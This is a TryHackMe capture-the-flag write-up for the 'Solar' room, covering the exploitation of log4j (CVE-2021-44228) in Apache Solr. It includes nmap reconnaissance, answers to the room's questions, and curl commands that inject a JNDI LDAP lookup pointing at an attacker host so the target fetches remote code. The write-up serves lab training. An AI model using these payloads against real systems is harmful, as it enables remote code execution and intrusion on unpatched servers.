TryHackMe Solar Write Up | Exploiting log4j

CVE-2021-44228 Apache Solr 8.11.1

TryHackMe Solar Write Up | Exploiting log4j
┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ nmap solar.thm -p- -sC -sV
TryHackMe Solar Write Up | Exploiting log4j

What service is running on port 8983? (Just the name of the software)

Apache Solr

Open the service running on port 8983 in your browser:

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ firefox http://solar.thm:8983
TryHackMe Solar Write Up | Exploiting log4j
SOLR GUI

What is the -Dsolr.log.dir argument set to, displayed on the front page?

/var/solr/logs

Which file includes contains this repeated entry? (Just the filename itself, no path needed)

TryHackMe Solar Write Up | Exploiting log4j
solr.log

What “path” or URL endpoint is indicated in these repeated entries?

/admin/cores

Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

params
┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.154.49:9999\}'

What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

TryHackMe Solar Write Up | Exploiting log4j
Listening on 0.0.0.0:1389
curl 'http://10.10.29.51:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.82.86:1389/Exploit\}'
python3 -m http.server
TryHackMe Solar Write Up | Exploiting log4j
TryHackMe Solar Write Up | Exploiting log4j
TryHackMe Solar Write Up | Exploiting log4j
TryHackMe Solar Write Up | Exploiting log4j

What is the full path of the specific solr.in.sh file?

/etc/default/solr.in.sh

https://tryhackme.com/room/solar

Leave a Comment

Are you excited?We are giving away a $50 gift card every day

Don’t miss the chance to participate in the biggest giveaway of this year.

Newsletter Signup

Subscribe to our weekly newsletter below and never miss the latest product or an exclusive offer.